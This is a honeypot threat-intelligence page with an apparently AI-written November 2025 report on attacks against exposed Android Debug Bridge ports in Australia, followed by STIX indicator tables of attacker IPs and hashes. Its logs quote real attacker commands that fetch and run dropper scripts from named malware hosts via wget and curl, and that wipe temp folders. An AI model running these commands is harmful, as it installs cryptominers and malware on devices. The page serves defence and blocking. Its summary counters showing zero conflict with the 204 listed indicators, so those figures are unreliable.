nadsec // adb telemetry // robert ai reporting // otx stix live //

Honeypot overview

ADB lure on 5555 with the telemetry laid bare.

Android Debug Bridge trap inside T-Pot CE. Indicators flow straight from the OTX STIX export, while Robert AI writes the monthly breakdown so you can brief stakeholders with specifics that matter.

Location: AustraliaProtocol: ADB / TCP 5555Month: November 2025

NadSec Honeypot

ADBHoney

Everything here is malicious on purpose. No production data.

Live

Data source

T-Pot CE

Raw logs to STIX to OTX pulse.

Report author

Robert AI

Summaries and snark only.

Snapshot

November 2025 Pulse

Quick stats parsed from the current month STIX export.

Monthly pulse

Unique IP indicators

0

Distinct source IPs in the STIX bundle.

Hash indicators

0

File hashes associated with ADB activity.

Indicator objects

0

Total STIX indicator objects.

Signal strength

0

Indicators show repeat infrastructure reuse this month.

Scope

ADB-only indicators

Signals come strictly from the ADB honeypot STIX bundle. No cross-talk from other services.

What to do

Drop into deny lists

Use IPs and hashes for blocking or enrichment. Share the pulse URL with your teammates.

Caveats

Noisy on purpose

Tune to your risk appetite before auto-blocking anything in prod. Need help implementing? NadTech Support can assist.

Monthly report

Robert's November 2025 brief

Generated by Robert AI

Threat Intelligence Report:

ADBHoney → Attacker IPs – Australia – November 2025


1. Executive Summary

If you left an Android Debug Bridge (ADB) port exposed in Australia this November, you weren’t just asking for trouble—you published an open invitation for the botnet goblins to hold a barbecue in your /data/local/tmp. Analysis of ADBHoney honeypot traffic for November 2025 shows the usual suspects running amok, led by Mirai’s less sophisticated but equally loud Android cousin: ADB.Miner. Infrastructure varies from “oops, forgot to lock down our cloud VM” all the way to “industrial-scale bulletproof bot-herding.” If you aren’t explicitly shipping a product that needs port 5555, it’s time to shut the gates and salt the earth.


2. Key Stats

  • Monitoring period: November 2025
  • Honeypot Location: Australia
  • Primary Target: TCP/5555 (ADB)
  • Event count per aggressive node: Up to 1,700+ events per single host
  • Total unique attacker IPs captured: Dozens, geographically diverse
  • Noteworthy ASNs: Pfcloud UG (NL), ColocaTel (DE), Optibounce (IR), DigitalOcean, Google Cloud, Akamai
  • Observed TTPs:
    • Mirai-style scanning and infection
    • Mass download/execution of dropper scripts
    • Common payloads: trinity, log, generic shell droppers
    • Coinminer heritage, no command-and-control detected
  • Malware file hashes captured: 30+ new SHA-256s for dropper binaries

3. Campaign Narrative

Here lies November’s grand tradition: mindless botnets rising from the malware bog to probe ADB/5555 and slop malware into any device that blinks in response. The heaviest action comes courtesy of bulletproof rental nodes out of the Netherlands and Germany (Pfcloud UG, ColocaTel, and kin), each vomiting hundreds to thousands of grossly similar ADB script drops and shell command attempts. Want your Android turned into a Monero mine shaft? This is how it starts.

The story is simple and repetitive: scan, find a sucker with ADB exposed, then spam wget/curl commands to drag down shell scripts and payloads (trinity, log, whatever is in fashion this week). Indie cloud VMs—DigitalOcean, Google, Akamai—get rented for drive-by scans. The main payload is still crypto-cowboy stuff, usually mining, all wrapped up in the wormy, Mirai-derived “push-and-pray” model.

The only thing missing is a C2 server with a neon sign. This campaign is a dumb, loud, and brutal army, not a stealth operation.


4. Infrastructure Details

Bulletproof Hosting and Heavy Hitters

  • Pfcloud UG (NL), ColocaTel (DE), Optibounce (IR):
    Main payload artillery. Massively overrepresented in events, seen pushing scripts and cleaning up their temp folders like digital raccoons. Example IPs: 176.65.148.34 (245 events), 176.65.149.243 (223 events), 193.142.147.209 (1717 events, just showing off at this point).

Cloud Platforms (Disposable Minion Tier)

  • DigitalOcean, Google Cloud, Akamai:
    Rent-a-node for opportunistic scanning. Moderate noise, likely to be tossed and re-registered faster than you can say “password123”.

Asia-based ISPs

  • Vietnamese ISPs, Korea Telecom:
    In the middle tier. Show both scanning and actual payload deployment. A few do get creative with shell script chains.

Actual Malware Hosting

  • Notably: 61.3.102.238 (National Internet Backbone, IN) flagged as malware_hosting—the greasy kitchen behind the ADB drive-thru.

Research Scanners (or, Actually, Not)

  • None found—everyone here is genuinely misbehaving, not just poking in the name of science.

5. Malware and Behaviour

We’re in well-trodden Mirai country. Here’s the modus operandi, summed up:

  • Recon: Blasting every Australian ADB port they can find, always on TCP/5555.

  • Execution:

    • Hits with commands like:
      cd /data/local/tmp/; busybox wget http://<malware_host>/w.sh; sh w.sh; curl http://<malware_host>/c.sh; sh c.sh; wget http://<malware_host>/wget.sh; sh wget.sh
      
    • Launches binaries, e.g. nohup /data/local/tmp/trinity or nohup log
    • Survives reboots, sticks to tmp, could install a miner or worm.
  • Payload:
    Not many creative samples here—just dozens of nearly identical droppers, hashes all over the shop, but the MO is clear. No C2 channel observed, it’s “smash and grab” for hashing power.

References for the curious:


6. Detection and Mitigation

If you’re still exposing ADB to the internet, you need to have a long, hard think about your life choices.

  • Block or strictly limit inbound 5555/TCP anywhere not explicitly needed.
  • Monitor for:
    • Inbound connections from any IPs listed herein (Pfcloud, ColocaTel, etc.)
    • New files/scripts in /data/local/tmp/, especially named trinity, log, or after a forced package update.
  • Hunt for signs of infection:
    • Unusual CPU spikes (mining).
    • Suspicious running procs: nohup log, nohup trinity, anything in /data/local/tmp.
  • Submit captured SHA-256s to sandboxes (VirusTotal, JoeSandbox, OTX) for behavioral clustering.
  • Report abuse for cloud IPs (DigitalOcean, Google, Akamai) but don’t count on them fixing it before lunch.
  • Blacklist high-volume, persistent bulletproof ASNs—they are poison for IoT, today and tomorrow.

STIX indicators

OTX pulse export

Parsed directly from the STIX bundle. Filter, search, and copy individual indicators for quick action.

Download STIX
Showing 204 of 204
TypeValueDescriptionLabelsValid from
IPv4162.142.125.196Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-10
IPv4198.235.24.207Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-10
IPv4211.184.55.136Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0scanning_host2025-11-10
IPv4216.218.206.66Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-10
IPv4216.218.206.74Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-10
IPv4103.125.189.66Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0scanning_host2025-11-10
IPv4159.196.168.164Attacker IP • ADB / seen in ADBHoney; events=11; ports=5555; cc=AU; asn=4764; asn_org=Aussie Broadband; adb_cmd_hits=0scanning_host2025-11-10
IPv485.11.183.5Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=GB; asn=212027; asn_org=PebbleHost Ltd; adb_cmd_hits=0scanning_host2025-11-09
IPv4104.237.156.209Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv488.247.182.131Attacker IP • ADB / seen in ADBHoney; events=46; ports=5555; cc=TR; asn=47331; asn_org=Turk Telekom; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp/*"scanning_host2025-11-09
SHA-25671ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5ADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/71ecfb7bbc015b2b192c05f726468b6f08fcc804c093c718b950e688cc414af5.raw; src_ips=88.247.182.131; cc=TR; last_seen=2025-11-09T14:24:09.628Z; cmds=[rm -rf /data/local/tmp/* | ps | grep trinity | am start -n com.ufo.miner/com.example.test.MainActivity]2025-11-09
SHA-25626e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9ccADB dropper sample / Captured within last 1h by ADBHoney; outfile=dl/26e72314a3c85dcd726ce1119d35279cb252d296cbe95504addd948ad32da9cc.raw; src_ips=88.247.182.131; cc=TR; last_seen=2025-11-09T14:23:33.343Z; cmds=[rm -rf /data/local/tmp/* | ps | grep trinity | am start -n com.ufo.miner/com.example.test.MainActivity]2025-11-09
IPv465.49.1.212Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv465.49.1.217Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv4204.76.203.230Attacker IP • ADB / seen in ADBHoney; events=12; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0scanning_host2025-11-09
IPv41.25.64.168Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.114.106.20Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.124.165.174Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=AL; asn=197706; asn_org=Keminet SHPK; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.14.224.2Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4103.176.113.222Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.183.119.48Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0scanning_host2025-11-09
IPv4103.231.249.52Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4103.30.10.48Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=VN; asn=63737; asn_org=VIETSERVER SERVICES TECHNOLOGY COMPANY LIMITED; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4104.248.130.34Attacker IP • ADB / seen in ADBHoney; events=63; ports=5555; cc=DE; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv4107.172.33.62Attacker IP • ADB / seen in ADBHoney; events=44; ports=5555; cc=US; asn=62164; asn_org=Heymman Servers Corporation; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4111.40.55.167Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=132525; asn_org=HeiLongJiang Mobile Communication Company Limited; adb_cmd_hits=0scanning_host2025-11-09
IPv4112.162.95.31Attacker IP • ADB / seen in ADBHoney; events=59; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; adb_cmd_hits=0; cmd="/data/local/tmp/nohup /data/local/tmp/trinity"scanning_host2025-11-09
IPv4112.87.194.251Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4112.90.220.244Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; adb_cmd_hits=0scanning_host2025-11-09
IPv4112.90.220.246Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=134543; asn_org=China Unicom Guangdong IP network; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4116.113.74.122Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=4837; asn_org=CHINA UNICOM China169 Backbone; adb_cmd_hits=0scanning_host2025-11-09
IPv4129.212.176.143Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4129.212.188.153Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4134.209.77.110Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4135.148.113.216Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=16276; asn_org=OVH SAS; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4137.184.169.247Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4138.197.131.20Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv414.225.19.28Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv414.225.20.39Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=VN; asn=135905; asn_org=VIETNAM POSTS AND TELECOMMUNICATIONS GROUP; adb_cmd_hits=0; cmd="cd /data/local/tmp/; busybox wget http://14.225.20.10/w.sh; sh w.sh; curl http://14.225.20.10/c.sh; sh c.sh; wget http://14.225.20.10/wget.sh; sh wget.sh; curl "scanning_host2025-11-09
IPv4142.93.199.16Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4142.93.255.85Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; adb_cmd_hits=0scanning_host2025-11-09
IPv4143.110.171.108Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=GB; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4143.42.164.182Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv4146.190.241.56Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=CA; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4146.70.188.236Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=BG; asn=9009; asn_org=M247 Europe SRL; adb_cmd_hits=0scanning_host2025-11-09
IPv4147.185.132.231Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4147.185.132.255Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4152.32.204.217Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=JP; asn=135377; asn_org=UCLOUD INFORMATION TECHNOLOGY HK LIMITED; adb_cmd_hits=0scanning_host2025-11-09
IPv4156.245.232.171Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=SC; asn=54801; asn_org=ZILLION-NETWORK; adb_cmd_hits=0scanning_host2025-11-09
IPv4157.245.115.28Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4157.245.118.24Attacker IP • ADB / seen in ADBHoney; events=17; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4162.142.125.125Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.248.133.114Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.248.133.116Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.248.133.121Attacker IP • ADB / seen in ADBHoney; events=6; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.94.138.195Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
IPv4167.99.1.98Attacker IP • ADB / seen in ADBHoney; events=15; ports=5555; cc=US; asn=14061; asn_org=DIGITALOCEAN-ASN; cats=Detection of a Network Scan,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4168.126.159.29Attacker IP • ADB / seen in ADBHoney; events=3; ports=5555; cc=KR; asn=4766; asn_org=Korea Telecom; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4172.236.228.245Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4173.255.223.73Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=US; asn=63949; asn_org=Akamai Connected Cloud; adb_cmd_hits=0scanning_host2025-11-09
IPv4176.65.148.155Attacker IP • ADB / seen in ADBHoney; events=18; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4176.65.148.34Attacker IP • ADB / seen in ADBHoney; events=245; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4176.65.149.209Attacker IP • ADB / seen in ADBHoney; events=57; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://213.209.143.62/w.sh; sh w.sh; curl http://213.209.143.62/c.sh; sh c.s"scanning_host2025-11-09
IPv4176.65.149.243Attacker IP • ADB / seen in ADBHoney; events=223; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; adb_cmd_hits=0; cmd="rm -rf /data/local/tmp; mkdir -p /data/local/tmp; cd /data/local/tmp/; busybox wget http://ip/w.sh; sh w.sh; curl http://ip/c.sh; sh c.sh; wget http://ip/wget.s"scanning_host2025-11-09
IPv4178.22.24.61Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=RU; asn=209290; asn_org=Galeon LLC; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4183.232.212.194Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4183.232.212.195Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=CN; asn=56040; asn_org=China Mobile communications corporation; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.195Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.196Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.203Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv4184.105.247.216Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=US; asn=6939; asn_org=HURRICANE; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.170.144.3Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=EE; asn=197414; asn_org=Xhost Internet Solutions Lp; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.217.0.181Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=SE; asn=42237; asn_org=w1n ltd; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.224.128.14Attacker IP • ADB / seen in ADBHoney; events=35; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.224.128.19Attacker IP • ADB / seen in ADBHoney; events=33; ports=5555; cc=NL; asn=49870; asn_org=Alsycon B.V.; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.242.226.59Attacker IP • ADB / seen in ADBHoney; events=23; ports=5555; cc=US; asn=202425; asn_org=IP Volume inc; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.243.96.116Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=UA; asn=48693; asn_org=Rices Privately owned enterprise; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4185.91.69.5Attacker IP • ADB / seen in ADBHoney; events=69; ports=5555; cc=GB; asn=201579; asn_org=Hostgnome Ltd; adb_cmd_hits=0scanning_host2025-11-09
IPv4186.220.88.42Attacker IP • ADB / seen in ADBHoney; events=14; ports=5555; cc=BR; asn=28573; asn_org=Claro NXT Telecomunicacoes Ltda; adb_cmd_hits=0scanning_host2025-11-09
IPv4188.92.79.113Attacker IP • ADB / seen in ADBHoney; events=10; ports=5555; cc=LV; asn=43513; asn_org=Sia Nano IT; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4193.138.7.191Attacker IP • ADB / seen in ADBHoney; events=16; ports=5555; cc=FI; asn=50304; asn_org=Blix Solutions AS; adb_cmd_hits=0scanning_host2025-11-09
IPv4193.142.147.209Attacker IP • ADB / seen in ADBHoney; events=1717; ports=5555; cc=DE; asn=213438; asn_org=ColocaTel Inc.; adb_cmd_hits=0; cmd="cd /data/local/tmp/; rm *; busybox wget http://94.154.35.154/arm.uhavenobotsxd; curl http://94.154.35.154/arm.uhavenobotsxd -O; chmod +x arm.uhavenobotsxd; ./ar"scanning_host2025-11-09
IPv4193.37.69.113Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=RU; asn=213194; asn_org=Nechaev Dmitry Sergeevich; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.164.107.5Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=50219; asn_org=VT-255-50219; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.180.48.148Attacker IP • ADB / seen in ADBHoney; events=4; ports=5555; cc=DE; asn=201814; asn_org=MEVSPACE sp. z o.o.; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.176.130Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=DE; asn=208843; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.176.149Attacker IP • ADB / seen in ADBHoney; events=7; ports=5555; cc=DE; asn=208843; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.178.202Attacker IP • ADB / seen in ADBHoney; events=5; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4194.187.178.95Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=HK; asn=215778; asn_org=Alpha Strike Labs GmbH; adb_cmd_hits=0scanning_host2025-11-09
IPv4196.251.81.89Attacker IP • ADB / seen in ADBHoney; events=39; ports=5555; cc=SC; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4196.251.84.60Attacker IP • ADB / seen in ADBHoney; events=42; ports=5555; cc=NL; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4196.251.84.86Attacker IP • ADB / seen in ADBHoney; events=41; ports=5555; cc=NL; asn=401120; asn_org=CHEAPY-HOST; cats=Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4197.0.29.184Attacker IP • ADB / seen in ADBHoney; events=9; ports=5555; cc=TN; asn=37705; asn_org=TOPNET; adb_cmd_hits=0scanning_host2025-11-09
IPv4198.235.24.43Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4198.235.24.75Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4198.235.24.76Attacker IP • ADB / seen in ADBHoney; events=24; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv420.163.57.193Attacker IP • ADB / seen in ADBHoney; events=26; ports=5555; cc=US; asn=8075; asn_org=MICROSOFT-CORP-MSN-AS-BLOCK; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv420.65.194.111Attacker IP • ADB / seen in ADBHoney; events=28; ports=5555; cc=US; asn=8075; asn_org=MICROSOFT-CORP-MSN-AS-BLOCK; cats=Detection of a Network Scan; adb_cmd_hits=0scanning_host2025-11-09
IPv4204.76.203.28Attacker IP • ADB / seen in ADBHoney; events=45; ports=5555; cc=NL; asn=51396; asn_org=Pfcloud UG; cats=Misc activity,Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.167Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.232Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.71Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; cats=Generic Protocol Command Decode,Misc activity; adb_cmd_hits=0scanning_host2025-11-09
IPv4205.210.31.76Attacker IP • ADB / seen in ADBHoney; events=22; ports=5555; cc=US; asn=396982; asn_org=GOOGLE-CLOUD-PLATFORM; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.168.34.198Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; cats=Generic Protocol Command Decode; adb_cmd_hits=0scanning_host2025-11-09
IPv4206.168.34.205Attacker IP • ADB / seen in ADBHoney; events=8; ports=5555; cc=US; asn=398324; asn_org=CENSYS-ARIN-01; adb_cmd_hits=0scanning_host2025-11-09
